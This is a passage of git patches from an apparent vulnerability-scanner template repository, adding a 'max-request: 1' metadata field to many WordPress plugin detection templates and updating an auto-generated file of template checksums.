     wpscan: https://wpscan.com/plugin/ultimate-addons-for-gutenberg
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/under-construction-page.yaml b/http/technologies/wordpress/plugins/under-construction-page.yaml
index d4ac0d179e..87721a245a 100644
--- a/http/technologies/wordpress/plugins/under-construction-page.yaml
+++ b/http/technologies/wordpress/plugins/under-construction-page.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/under-construction-page/
   metadata:
+    max-request: 1
     plugin_namespace: under-construction-page
     wpscan: https://wpscan.com/plugin/under-construction-page
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/updraftplus.yaml b/http/technologies/wordpress/plugins/updraftplus.yaml
index dbbadf3cfc..45e0dead0e 100644
--- a/http/technologies/wordpress/plugins/updraftplus.yaml
+++ b/http/technologies/wordpress/plugins/updraftplus.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/updraftplus/
   metadata:
+    max-request: 1
     plugin_namespace: updraftplus
     wpscan: https://wpscan.com/plugin/updraftplus
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/use-any-font.yaml b/http/technologies/wordpress/plugins/use-any-font.yaml
index 401b0e479f..abec174ec3 100644
--- a/http/technologies/wordpress/plugins/use-any-font.yaml
+++ b/http/technologies/wordpress/plugins/use-any-font.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/use-any-font/
   metadata:
+    max-request: 1
     plugin_namespace: use-any-font
     wpscan: https://wpscan.com/plugin/use-any-font
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/user-role-editor.yaml b/http/technologies/wordpress/plugins/user-role-editor.yaml
index 6f95506748..e088ac07a6 100644
--- a/http/technologies/wordpress/plugins/user-role-editor.yaml
+++ b/http/technologies/wordpress/plugins/user-role-editor.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/user-role-editor/
   metadata:
+    max-request: 1
     plugin_namespace: user-role-editor
     wpscan: https://wpscan.com/plugin/user-role-editor
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml b/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml
index 4404f87aab..8b163200bf 100644
--- a/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml
+++ b/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/velvet-blues-update-urls/
   metadata:
+    max-request: 1
     plugin_namespace: velvet-blues-update-urls
     wpscan: https://wpscan.com/plugin/velvet-blues-update-urls
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/w3-total-cache.yaml b/http/technologies/wordpress/plugins/w3-total-cache.yaml
index 8995434fce..2366a7dad7 100644
--- a/http/technologies/wordpress/plugins/w3-total-cache.yaml
+++ b/http/technologies/wordpress/plugins/w3-total-cache.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/w3-total-cache/
   metadata:
+    max-request: 1
     plugin_namespace: w3-total-cache
     wpscan: https://wpscan.com/plugin/w3-total-cache
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml
index 8175806cb8..71448e61e8 100644
--- a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml
+++ b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/webp-converter-for-media/
   metadata:
+    max-request: 1
     plugin_namespace: webp-converter-for-media
     wpscan: https://wpscan.com/plugin/webp-converter-for-media
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/webp-express.yaml b/http/technologies/wordpress/plugins/webp-express.yaml
index db82bc7f43..717554b89f 100644
--- a/http/technologies/wordpress/plugins/webp-express.yaml
+++ b/http/technologies/wordpress/plugins/webp-express.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/webp-express/
   metadata:
+    max-request: 1
     plugin_namespace: webp-express
     wpscan: https://wpscan.com/plugin/webp-express
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml
index 03ddae57bc..fba5c8b09c 100644
--- a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml
+++ b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/widget-importer-exporter/
   metadata:
+    max-request: 1
     plugin_namespace: widget-importer-exporter
     wpscan: https://wpscan.com/plugin/widget-importer-exporter
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml
index d6449bb5bf..631202198e 100644
--- a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml
+++ b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/woo-cart-abandonment-recovery/
   metadata:
+    max-request: 1
     plugin_namespace: woo-cart-abandonment-recovery
     wpscan: https://wpscan.com/plugin/woo-cart-abandonment-recovery
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml
index 2d5fdf1779..cc953078eb 100644
--- a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml
+++ b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/woo-checkout-field-editor-pro/
   metadata:
+    max-request: 1
     plugin_namespace: woo-checkout-field-editor-pro
     wpscan: https://wpscan.com/plugin/woo-checkout-field-editor-pro
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml
index 6b5705e20d..97ce674116 100644
--- a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml
+++ b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/woo-variation-swatches/
   metadata:
+    max-request: 1
     plugin_namespace: woo-variation-swatches
     wpscan: https://wpscan.com/plugin/woo-variation-swatches
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml
index dbcdb64bad..6d05a6f058 100644
--- a/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce-gateway-paypal-express-checkout/
   metadata:
+    max-request: 1
     plugin_namespace: woocommerce-gateway-paypal-express-checkout
     wpscan: https://wpscan.com/plugin/woocommerce-gateway-paypal-express-checkout
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml
index fb9ea502ce..baf5af3bb5 100644
--- a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce-gateway-stripe/
   metadata:
+    max-request: 1
     plugin_namespace: woocommerce-gateway-stripe
     wpscan: https://wpscan.com/plugin/woocommerce-gateway-stripe
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-payments.yaml
index 48ffb25245..aa1898c4ba 100644
--- a/http/technologies/wordpress/plugins/woocommerce-payments.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-payments.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce-payments/
   metadata:
+    max-request: 1
     plugin_namespace: woocommerce-payments
     wpscan: https://wpscan.com/plugin/woocommerce-payments
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml
index 4fa6fc3ffe..5fae796fdd 100644
--- a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce-paypal-payments/
   metadata:
+    max-request: 1
     plugin_namespace: woocommerce-paypal-payments
     wpscan: https://wpscan.com/plugin/woocommerce-paypal-payments
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml
index 1c1c690fcd..22f812e2b8 100644
--- a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce-pdf-invoices-packing-slips/
   metadata:
+    max-request: 1
     plugin_namespace: woocommerce-pdf-invoices-packing-slips
     wpscan: https://wpscan.com/plugin/woocommerce-pdf-invoices-packing-slips
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-services.yaml b/http/technologies/wordpress/plugins/woocommerce-services.yaml
index 4d6702d81a..c637006d26 100644
--- a/http/technologies/wordpress/plugins/woocommerce-services.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-services.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce-services/
   metadata:
+    max-request: 1
     plugin_namespace: woocommerce-services
     wpscan: https://wpscan.com/plugin/woocommerce-services
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce.yaml b/http/technologies/wordpress/plugins/woocommerce.yaml
index 42cb8bc409..e020507ccb 100644
--- a/http/technologies/wordpress/plugins/woocommerce.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce/
   metadata:
+    max-request: 1
     plugin_namespace: woocommerce
     wpscan: https://wpscan.com/plugin/woocommerce
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wordfence.yaml b/http/technologies/wordpress/plugins/wordfence.yaml
index 55d6effbf5..c92903fd79 100644
--- a/http/technologies/wordpress/plugins/wordfence.yaml
+++ b/http/technologies/wordpress/plugins/wordfence.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wordfence/
   metadata:
+    max-request: 1
     plugin_namespace: wordfence
     wpscan: https://wpscan.com/plugin/wordfence
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wordpress-importer.yaml b/http/technologies/wordpress/plugins/wordpress-importer.yaml
index 6786cab703..c25b2c1c48 100644
--- a/http/technologies/wordpress/plugins/wordpress-importer.yaml
+++ b/http/technologies/wordpress/plugins/wordpress-importer.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wordpress-importer/
   metadata:
+    max-request: 1
     plugin_namespace: wordpress-importer
     wpscan: https://wpscan.com/plugin/wordpress-importer
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wordpress-seo.yaml b/http/technologies/wordpress/plugins/wordpress-seo.yaml
index 784ba22c8a..4d6dd14d25 100644
--- a/http/technologies/wordpress/plugins/wordpress-seo.yaml
+++ b/http/technologies/wordpress/plugins/wordpress-seo.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wordpress-seo/
   metadata:
+    max-request: 1
     plugin_namespace: wordpress-seo
     wpscan: https://wpscan.com/plugin/wordpress-seo
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/worker.yaml b/http/technologies/wordpress/plugins/worker.yaml
index 72ff55e58a..7ca0870ed6 100644
--- a/http/technologies/wordpress/plugins/worker.yaml
+++ b/http/technologies/wordpress/plugins/worker.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/worker/
   metadata:
+    max-request: 1
     plugin_namespace: worker
     wpscan: https://wpscan.com/plugin/worker
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml
index 8cfaa0f5a9..4f0d9be568 100644
--- a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml
+++ b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-fastest-cache/
   metadata:
+    max-request: 1
     plugin_namespace: wp-fastest-cache
     wpscan: https://wpscan.com/plugin/wp-fastest-cache
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-file-manager.yaml b/http/technologies/wordpress/plugins/wp-file-manager.yaml
index 85900a01a7..f3c481b824 100644
--- a/http/technologies/wordpress/plugins/wp-file-manager.yaml
+++ b/http/technologies/wordpress/plugins/wp-file-manager.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-file-manager/
   metadata:
+    max-request: 1
     plugin_namespace: wp-file-manager
     wpscan: https://wpscan.com/plugin/wp-file-manager
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-google-maps.yaml b/http/technologies/wordpress/plugins/wp-google-maps.yaml
index a7ccde0b49..ba214fd7ea 100644
--- a/http/technologies/wordpress/plugins/wp-google-maps.yaml
+++ b/http/technologies/wordpress/plugins/wp-google-maps.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-google-maps/
   metadata:
+    max-request: 1
     plugin_namespace: wp-google-maps
     wpscan: https://wpscan.com/plugin/wp-google-maps
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml
index 422664a98c..8f5fe8d9a5 100644
--- a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml
+++ b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-mail-smtp/
   metadata:
+    max-request: 1
     plugin_namespace: wp-mail-smtp
     wpscan: https://wpscan.com/plugin/wp-mail-smtp
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml
index f0af3a748a..0458b13354 100644
--- a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml
+++ b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-maintenance-mode/
   metadata:
+    max-request: 1
     plugin_namespace: wp-maintenance-mode
     wpscan: https://wpscan.com/plugin/wp-maintenance-mode
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-migrate-db.yaml b/http/technologies/wordpress/plugins/wp-migrate-db.yaml
index f89f1a20b3..d570be07bf 100644
--- a/http/technologies/wordpress/plugins/wp-migrate-db.yaml
+++ b/http/technologies/wordpress/plugins/wp-migrate-db.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-migrate-db/
   metadata:
+    max-request: 1
     plugin_namespace: wp-migrate-db
     wpscan: https://wpscan.com/plugin/wp-migrate-db
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml
index 01fb12d0ad..ee05e3add8 100644
--- a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml
+++ b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-multibyte-patch/
   metadata:
+    max-request: 1
     plugin_namespace: wp-multibyte-patch
     wpscan: https://wpscan.com/plugin/wp-multibyte-patch
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-optimize.yaml b/http/technologies/wordpress/plugins/wp-optimize.yaml
index 1773857e15..df2487955f 100644
--- a/http/technologies/wordpress/plugins/wp-optimize.yaml
+++ b/http/technologies/wordpress/plugins/wp-optimize.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-optimize/
   metadata:
+    max-request: 1
     plugin_namespace: wp-optimize
     wpscan: https://wpscan.com/plugin/wp-optimize
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-pagenavi.yaml b/http/technologies/wordpress/plugins/wp-pagenavi.yaml
index bcd1509c68..79ff01211c 100644
--- a/http/technologies/wordpress/plugins/wp-pagenavi.yaml
+++ b/http/technologies/wordpress/plugins/wp-pagenavi.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-pagenavi/
   metadata:
+    max-request: 1
     plugin_namespace: wp-pagenavi
     wpscan: https://wpscan.com/plugin/wp-pagenavi
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-reset.yaml b/http/technologies/wordpress/plugins/wp-reset.yaml
index c6aca20a60..23414b3d1d 100644
--- a/http/technologies/wordpress/plugins/wp-reset.yaml
+++ b/http/technologies/wordpress/plugins/wp-reset.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-reset/
   metadata:
+    max-request: 1
     plugin_namespace: wp-reset
     wpscan: https://wpscan.com/plugin/wp-reset
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml
index 56dfdf4a59..fba45020e4 100644
--- a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml
+++ b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-reviews-plugin-for-google/
   metadata:
+    max-request: 1
     plugin_namespace: wp-reviews-plugin-for-google
     wpscan: https://wpscan.com/plugin/wp-reviews-plugin-for-google
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-rollback.yaml b/http/technologies/wordpress/plugins/wp-rollback.yaml
index 810fc82cde..0178c8e9fb 100644
--- a/http/technologies/wordpress/plugins/wp-rollback.yaml
+++ b/http/technologies/wordpress/plugins/wp-rollback.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-rollback/
   metadata:
+    max-request: 1
     plugin_namespace: wp-rollback
     wpscan: https://wpscan.com/plugin/wp-rollback
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-seopress.yaml b/http/technologies/wordpress/plugins/wp-seopress.yaml
index 2276545093..017cf76f11 100644
--- a/http/technologies/wordpress/plugins/wp-seopress.yaml
+++ b/http/technologies/wordpress/plugins/wp-seopress.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-seopress/
   metadata:
+    max-request: 1
     plugin_namespace: wp-seopress
     wpscan: https://wpscan.com/plugin/wp-seopress
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml
index 783d381ed8..a04ddc6003 100644
--- a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml
+++ b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-sitemap-page/
   metadata:
+    max-request: 1
     plugin_namespace: wp-sitemap-page
     wpscan: https://wpscan.com/plugin/wp-sitemap-page
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-smushit.yaml b/http/technologies/wordpress/plugins/wp-smushit.yaml
index 27f6d46c2b..bc83478f06 100644
--- a/http/technologies/wordpress/plugins/wp-smushit.yaml
+++ b/http/technologies/wordpress/plugins/wp-smushit.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-smushit/
   metadata:
+    max-request: 1
     plugin_namespace: wp-smushit
     wpscan: https://wpscan.com/plugin/wp-smushit
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-statistics.yaml b/http/technologies/wordpress/plugins/wp-statistics.yaml
index ab61cc0338..dedd2e23b6 100644
--- a/http/technologies/wordpress/plugins/wp-statistics.yaml
+++ b/http/technologies/wordpress/plugins/wp-statistics.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-statistics/
   metadata:
+    max-request: 1
     plugin_namespace: wp-statistics
     wpscan: https://wpscan.com/plugin/wp-statistics
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-super-cache.yaml b/http/technologies/wordpress/plugins/wp-super-cache.yaml
index 5f6fbc1f75..03cd7137a8 100644
--- a/http/technologies/wordpress/plugins/wp-super-cache.yaml
+++ b/http/technologies/wordpress/plugins/wp-super-cache.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-super-cache/
   metadata:
+    max-request: 1
     plugin_namespace: wp-super-cache
     wpscan: https://wpscan.com/plugin/wp-super-cache
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-user-avatar.yaml b/http/technologies/wordpress/plugins/wp-user-avatar.yaml
index d67150d038..a68d4b7d78 100644
--- a/http/technologies/wordpress/plugins/wp-user-avatar.yaml
+++ b/http/technologies/wordpress/plugins/wp-user-avatar.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-user-avatar/
   metadata:
+    max-request: 1
     plugin_namespace: wp-user-avatar
     wpscan: https://wpscan.com/plugin/wp-user-avatar
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml
index beeba7ca69..bf9dfc3ad8 100644
--- a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml
+++ b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wpcf7-recaptcha/
   metadata:
+    max-request: 1
     plugin_namespace: wpcf7-recaptcha
     wpscan: https://wpscan.com/plugin/wpcf7-recaptcha
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml
index c225df7bfd..47911a86a5 100644
--- a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml
+++ b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wpcf7-redirect/
   metadata:
+    max-request: 1
     plugin_namespace: wpcf7-redirect
     wpscan: https://wpscan.com/plugin/wpcf7-redirect
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wpforms-lite.yaml b/http/technologies/wordpress/plugins/wpforms-lite.yaml
index aaad04cb76..1c25b6f488 100644
--- a/http/technologies/wordpress/plugins/wpforms-lite.yaml
+++ b/http/technologies/wordpress/plugins/wpforms-lite.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wpforms-lite/
   metadata:
+    max-request: 1
     plugin_namespace: wpforms-lite
     wpscan: https://wpscan.com/plugin/wpforms-lite
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wps-hide-login.yaml b/http/technologies/wordpress/plugins/wps-hide-login.yaml
index ff750a7d2a..b36317acd8 100644
--- a/http/technologies/wordpress/plugins/wps-hide-login.yaml
+++ b/http/technologies/wordpress/plugins/wps-hide-login.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wps-hide-login/
   metadata:
+    max-request: 1
     plugin_namespace: wps-hide-login
     wpscan: https://wpscan.com/plugin/wps-hide-login
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml
index f1e7595ccd..5eb35dd17e 100644
--- a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml
+++ b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wpvivid-backuprestore/
   metadata:
+    max-request: 1
     plugin_namespace: wpvivid-backuprestore
     wpscan: https://wpscan.com/plugin/wpvivid-backuprestore
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml
index 4b2769ee46..ceb2b8d600 100644
--- a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml
+++ b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/yith-woocommerce-wishlist/
   metadata:
+    max-request: 1
     plugin_namespace: yith-woocommerce-wishlist
     wpscan: https://wpscan.com/plugin/yith-woocommerce-wishlist
   tags: tech,wordpress,wp-plugin,top-100,top-200

From a2a2966ab517c5c8e1a300aef46eb27122b537ce Mon Sep 17 00:00:00 2001
From: GitHub Action 
Date: Sat, 23 Sep 2023 09:18:43 +0000
Subject: [PATCH 0494/1090] Auto Generated Templates Checksum [Sat Sep 23
 09:18:43 UTC 2023] :robot:

---
 templates-checksum.txt | 404 ++++++++++++++++++++---------------------
 1 file changed, 202 insertions(+), 202 deletions(-)

diff --git a/templates-checksum.txt b/templates-checksum.txt
index 5985451463..2192d6df30 100644
--- a/templates-checksum.txt
+++ b/templates-checksum.txt
@@ -18,7 +18,7 @@ dns/dns-saas-service-detection.yaml:b8e5a37cc3e5fcdeb3ec3a742b8bc81babf5c302
 dns/dns-waf-detect.yaml:f4d80afe7d48cee91123294482cd63cadeaa943d
 dns/dnssec-detection.yaml:6dd2e7d114f3be862e2f1e87f5d2d2c4de1bf08a
 dns/ec2-detection.yaml:01823f3399c471516137b067f37f5c6661ae3099
-dns/elasticbeanstalk-takeover.yaml:74b8ac376c2770b3b3bee93c15ff4de8b7c36f28
+dns/elasticbeanstalk-takeover.yaml:74782c42ecb76272ac56760c6216b71d9cb13e26
 dns/mx-fingerprint.yaml:191e425d8cad1d504d8f7ca3b19914cfd77ebb7b
 dns/mx-service-detector.yaml:30d6bf3fec86d54f93a83438afe8595aff572212
 dns/nameserver-fingerprint.yaml:73093f4b321ce7b50e4f1cd0b16b037beb85b008
@@ -5852,218 +5852,218 @@ http/technologies/weblogic-detect.yaml:e7cd5e93e7dd6c1625553aa3ad3c5b47e9bfb498
 http/technologies/werkzeug-debugger-detect.yaml:d840275037a23f116bab272b6d7658cd9156e8af
 http/technologies/wms-server-detect.yaml:45c90b9c1ebd969c113b5226d8714e38434a6813
 http/technologies/wondercms-detect.yaml:b485ce65e953f7a8d97fc2bdb7e8e81f9900b114
-http/technologies/wordpress/plugins/ad-inserter.yaml:f6e7f6ffa7889adea4d25065e99b592f729482ed
-http/technologies/wordpress/plugins/add-to-any.yaml:7b142b33ba32b11c48ff8313881a6ce6805d6bf1
-http/technologies/wordpress/plugins/admin-menu-editor.yaml:364449c7a34df835665302b9eca8dd8c83fada4e
+http/technologies/wordpress/plugins/ad-inserter.yaml:dcc200a556b9acbe534e1602320c36a7de790bdd
+http/technologies/wordpress/plugins/add-to-any.yaml:0a6b25111eae4afc694c46433e2c508ea2b90539
+http/technologies/wordpress/plugins/admin-menu-editor.yaml:8602eaf564f6138e2a37576450107bfddbe34a51
 http/technologies/wordpress/plugins/adminimize.yaml:3f8e114ab592d30a1d4195f22d46de3b9fc28ed0
-http/technologies/wordpress/plugins/advanced-custom-fields.yaml:5f663f06fb30dd885af3c87149ec7bddce2b7fc0
-http/technologies/wordpress/plugins/akismet.yaml:9459d684de796a26900072f65b9fbbb664bbfda5
